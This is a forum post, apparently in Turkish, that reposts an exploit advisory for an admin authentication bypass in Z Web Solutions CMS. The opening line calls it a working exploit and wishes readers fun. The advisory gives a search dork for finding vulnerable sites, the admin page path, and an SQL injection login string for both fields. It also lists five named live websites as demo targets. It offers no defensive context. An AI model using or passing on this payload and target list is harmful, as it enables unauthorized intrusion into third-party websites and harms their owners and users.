İşe yarayan bir açıktır, iyi eğlenceler.
Kod:
######################
# Exploit Title : Z Web Solutions CMS Admin Page Bypass
# Exploit Author : mr_mask_black & sir.h4m1d
# Vendor Homepage : www.thezweb.com
# Google Dork : intext:"Website design & SEO Services from Z Web Solutions"
# Date: 2016/6/26
# Tested On : win 7
# Contact:[email protected]
######################
# Vulnerable File : index.php
# Describe : Search dork and select Target. Put admin/index.php After url such as :
# http://site.com/admin/index.php
# Now enter fill Gebruikersnaam(username) and Wachtwoord(Password) like the information below :
# Username: '=' 'OR'
# Password: '=' 'OR'
#
# OK :)
#
# Demo :
# http://maikholvad.com/admin/index.php
# http://www.sansadadarshgramyojnachikhli.com/admin/index.php
# http://www.khatmenubuwwat.org/admin/index.php
# http://www.markazeislami.com/admin/index.php
# http://jamiahkosamba.com/admin/index.php
#
#
######################
# discovered by : mr_mask_black & sir.h4m1d
######################
# thanks to :|| king of peace || p[E]ym[A]n | mahyar | kian error | king dawn | and all friends ...
######################